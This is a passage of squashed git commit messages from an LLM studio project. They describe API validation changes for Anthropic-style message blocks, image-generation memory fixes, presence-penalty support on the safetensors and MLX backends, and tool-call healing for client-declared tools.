runs (completed prepends the clip, failed surfaces the error, the
cancelled sentinel stays toast-free). The API-key training-start guards
now also probe the video backend for an in-flight background clip, since
it is no longer visible as an in-flight HTTP request to the keep-warm
counter.
Route tests keep the fake backend for load/generate/status but inherit
the real job machinery, covering immediate accept, concurrent 409, the
terminal completed record, sanitized/ValueError/cancelled failures, and
cancel of a running job.
* Studio /v1/messages: accept thinking and unknown content blocks
The Anthropic-compatible /v1/messages endpoint modeled a message's content as
Union[str, list[{text|image|tool_use|tool_result}]], so any other block type
made Pydantic reject the whole request with
`messages.N.content.str: Input should be a valid string`. Resuming a Claude
session commonly replays assistant turns that carry `thinking` (extended
thinking) blocks, and sometimes a null content for a tool-only turn, both of
which tripped this and returned a 400.
Accept them:
- Add a permissive AnthropicUnknownBlock fallback (any block whose type is not
one of the four known ones), so thinking/redacted_thinking/provider-specific/
future blocks validate. A validator keeps known types on their typed models,
so a malformed known block (e.g. a tool_use without id) still fails cleanly.
- Coerce a null message (and tool_result) content to "" so the converter's
`for block in content` stays safe.
The converter already drops block types it does not translate, so a thinking
block is not forwarded to the model.
* Studio /v1/messages: keep user content validation strict
Make the thinking/null leniency role-aware so it never silently drops real
user input. Assistant turns (replayed history) still accept unknown/thinking
blocks and coerce a null tool-only turn to empty. User turns keep the strict
boundary: a null user content is rejected, and a content block the converter
cannot translate is rejected instead of being dropped into an empty prompt.
Also remove an empty file committed by accident.
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* Studio /v1/messages: coalesce resumed user turns and tighten content checks
- The /v1/messages count and generation paths now coalesce the adjacent user
turns that dropping an empty or null assistant turn can leave behind, so a
strict GGUF chat template no longer 400s on non-alternating roles.
- A user content block with a non-string type (list / dict) is rejected as a
clean 400 instead of raising TypeError and escaping as a 500.
- The assistant null-to-empty coercion only applies to an explicit null; an
assistant turn that omits content entirely still fails required-field
validation instead of being silently coerced to an empty string.
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Fold PR #6872's image-generation fixes into the branch, deduped against the
round-12 dataset-upload and gallery integrity work already on image-generation.
Fixes carried forward from #6872:
- fp8 single-file transformer memory estimate: an fp8 checkpoint loads with no
quantization_config and diffusers upcasts it to bf16 (~2x resident), so budget
it accordingly in _plan_memory and estimate_safetensors_dense_mib.
- dense-quant OOM-evict preflight: when the GGUF fits resident but the dense bf16
transformer this path materializes does not, skip the fast path up front rather
than evict the current pipeline and OOM in finalization. Combined with the
existing offload->resident candidate re-plan so both the family-table estimate
and the on-disk shard measurement gate engagement (unified on the
transformer_resident_override_mib plan override).
- ControlNet: evict the previous module and its from_pipe wrapper before loading a
new one so swapping ControlNets within a base-model load cannot accumulate to OOM.
- ControlNet union_control_mode: raise on an unknown control type instead of
silently defaulting to canny.
- edit-family mask rejection: raise instead of silently dropping a mask on an
image-editing model that has no inpaint pipeline.
- companion cache: walk the snapshot dir and exclude transformer/ so the
dense-quant prefetch's cached shards do not inflate the companion total and
wrongly force offload.
- training: drop piecewise_constant from the LR scheduler enum and force bf16 for
fp16-incompatible families.
- dataset upload: batch-atomic staging with the same-stem duplicate guard.
- images page: guard negative-prompt restore on guidance>0, clear stale ControlNet
selection on restore, and revert an optimistic quant label when a pipeline load
never starts.
- uninstall (sh + ps1): keep the owner-marker guard on sd.cpp removal.
Conflicts resolved in favour of image-generation's evolved memory system,
loadSpecFor catalog, and stop-and-save (lora_path) run detection; #6872's fp8 and
dense-preflight fixes carried forward on top. All affected backend tests pass
(test_diffusion_backend, test_diffusion_training, test_diffusion_lora_trainer,
test_video_gallery, test_diffusion_controlnet).
Follow-up to removing piecewise_constant from the trainable scheduler allow-list: the
DiffusionTrainingStartRequest.lr_scheduler Literal still advertised it, so a client that
picked it straight from the schema passed request validation and then hit the 400 from
normalized(). Remove it from the enum too so the API only offers schedulers the trainers
can actually run, and add a test asserting the enum never advertises a scheduler outside
the validation allow-list.
* Studio: apply presence_penalty on the safetensors and MLX inference paths
The safetensors and MLX generate paths resolved the inference config and
then dropped presence_penalty before generation, so the same model applied
the configured value under GGUF and 0 under safetensors/MLX. Thread the
already-resolved presence_penalty through the orchestrator command, worker
gen_kwargs, and the safetensors/MLX generate calls, and apply it with a
small logits processor (subtract once per distinct completion token,
prompt excluded, presence not frequency, zero is a no-op, negatives raise).
Backwards compatible: presence_penalty defaults to 0.0 (byte-identical
output when unset) and the GGUF path is unchanged. Also forward min_p on
the legacy /generate/stream route and add the missing min_p field to
GenerateRequest.
* Studio: bound presence_penalty generated ids to valid vocab range on both paths
The presence-penalty logits processors index by generated token ids. The
torch path filtered only the upper bound (seen < vocab_size), so a negative
id would silently wrap to the wrong row; the MLX path had no bound at all,
and MLX out-of-bounds indexing is documented undefined behavior (crash or
memory corruption on Apple Silicon), unlike torch's harmless negative wrap.
Bound generated ids to [0, vocab) consistently on both paths:
- torch: seen[(seen >= 0) & (seen < vocab_size)] (zero-regression safety net;
real completion tokens are always in range).
- MLX: route out-of-range/negative ids to a discarded scratch slot via
mx.where and a (vocab + 1)-wide scatter-assign mask, then subtract. MLX has
no boolean-mask filtering (data-dependent output shape), so this keeps a
fixed shape, stays on-device, and preserves once-per-distinct-token
semantics without any torch/numpy dependency.
Add torch tests for out-of-range and negative ids (only in-range distinct
ids penalized, stray ids ignored, no wrong-index wrap) and a bound-documenting
MLX test that runs on the arm64 macOS CI.
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* Studio: client-tool passthrough healing for safetensors and MLX
PR 6801 made response-side tool-call healing default-on for the client-tool
passthrough, but only on the GGUF path: the passthrough branch in
/v1/chat/completions is gated on using_gguf, and the safetensors section never
reads payload.tools, so a client-tools request against a safetensors or MLX
model silently dropped the tool schemas and returned prose with no tool_calls.
Add the missing leg. When a non-GGUF model is loaded, the request declares
client tools (or carries tool-role history), server-side tools are off, and the
template supports tools, the route now:
- renders the tools into the chat template for a single turn via the existing
backend.generate_chat_response(..., tools=...) seam (worker templating
already accepts role=tool and assistant.tool_calls messages, normalized with
_openai_messages_for_passthrough);
- non-streaming: promotes text-form calls with heal_openai_message, honors the
opt-in nudge single retry (nudge_should_retry / nudge_messages), caps healed
calls when parallel_tool_calls=false (covers the nudge retry too), and sets
finish_reason=tool_calls with content null on a pure tool-call turn;
- streaming: derives deltas from the worker's cumulative snapshots and feeds
StreamToolCallHealer, emitting healed tool-call deltas and the correct
finish chunk, guarded against repeated or shrinking snapshots.
heal_gate semantics are identical to the GGUF passthrough: default on,
auto_heal_tool_calls=false or UNSLOTH_DISABLE_TOOL_CALL_HEALING=1 relays
verbatim, tool_choice narrows promotion, undeclared names stay text. MLX rides
the same orchestrator seam, so both local backends gain the behavior.
CompletionMessage.content becomes Optional so a promoted pure tool-call turn
matches the OpenAI contract (content null when only tool_calls return).
Adds tests/test_sf_client_tools_passthrough.py (22 cases: healing, gating,
opt-outs, streaming deltas, tool-role history, dict-arguments history, forced
tool_choice, parallel cap, usage, nudge on/off/double-failure, generator error
hygiene, disconnect reset, empty output, MLX path).
* Address review: tool_choice none, developer folding, retry fallback, monitor reply
Four review follow-ups on the safetensors/MLX client-tool passthrough leg:
- tool_choice="none" keeps the tool-history templating but no longer
advertises the tools, so a forced final-answer turn is not prompted into
emitting markup that the (correctly disabled) healer would relay as prose.
Mirrors the GGUF passthrough where llama-server honors tool_choice itself.
- OpenAI "developer" messages fold into a single leading system message via
_set_or_prepend_system_message before templating; local templates reject the
role and the fallback formatter drops it.
- A nudge retry that fails or is cancelled after the original answer exists
falls back to the first response instead of surfacing a 500, matching the
GGUF nudge path.
- The API monitor records the healed tool call summary instead of the raw
markup on a promoted turn.
Adds four regression tests.
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* Address review: forced tool_choice templating, content-part flattening, stream monitor parity
- A forced tool_choice function is now the only schema rendered into the
local template, so the advertised tools and the healer allowlist can no
longer disagree (llama-server enforces tool_choice itself on the GGUF path).
- Content-part lists are flattened to their text parts before templating.
Remote image URLs are not decodable locally, so such requests reached this
path with part lists that raise inside apply_chat_template on text-only
templates; the plain non-GGUF path has always flattened them.
- The streaming monitor entry is now fed from the healed events the client
actually receives, recording promoted calls as the [tool_calls] summary
the non-streaming path records.
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* Address review: gate passthrough on the engaged server path, deserialize templated arguments
- The client-tools gate now keys on _sf_use_tools (whether the server-side
tool path actually claimed the request) instead of the raw mcp_enabled
flag: with an empty MCP registry or a CLI --disable-tools policy, a client
that sets mcp_enabled while declaring its own tools fell through to plain
generation with the tools silently dropped. The GGUF passthrough gate has
no mcp_enabled clause either.
- New _structured_tool_history_for_local_template deserializes assistant
tool_calls[].function.arguments JSON strings into mappings for the
templated copy only: spec-compliant clients send strings, but local chat
templates iterate arguments as a mapping or raise on strings, which
crashed or misrendered multi-turn tool history. The HTTP response and the
GGUF wire shape keep strings.
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* Tighten comments and docstrings in the client-tools passthrough
* Report first-attempt usage when a nudge retry is discarded
When nudge_should_retry fires but the retry produces no healable tool call
(or raises), the first response is still delivered to the client. The retry's
generate() had already overwritten stats_holder, so _monitor_usage recorded
the unseen retry's token counts against the request instead of the first
attempt that was actually returned. Capture the first attempt's stats before
the retry and restore them on both the no-heal and exception paths so the
monitor reports the usage of the response the caller received.
* Do not promote buffered tool markup when a stream is cancelled
The streaming client-tool heal path breaks out of the token loop when
cancel_event is set (the registry "Stop" path), but then still fell through to
healer.finalize(), which heals incomplete tool markup at EOF (allow_incomplete)
and emits a tool_calls delta plus finish_reason=tool_calls. Because the Stop
request only sets the event and leaves the SSE socket open, the client received
that promoted call and executed a tool the user had just cancelled. The disconnect
path already returns before finalize; guard finalize and the finish_reason on
cancel_event too, so a cancelled stream ends with finish_reason=stop and no tool
call. Adds a regression test driving a Stop mid-emission with buffered markup.
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* Trim comments in the client-tools passthrough
* Trim client-tools passthrough comments further
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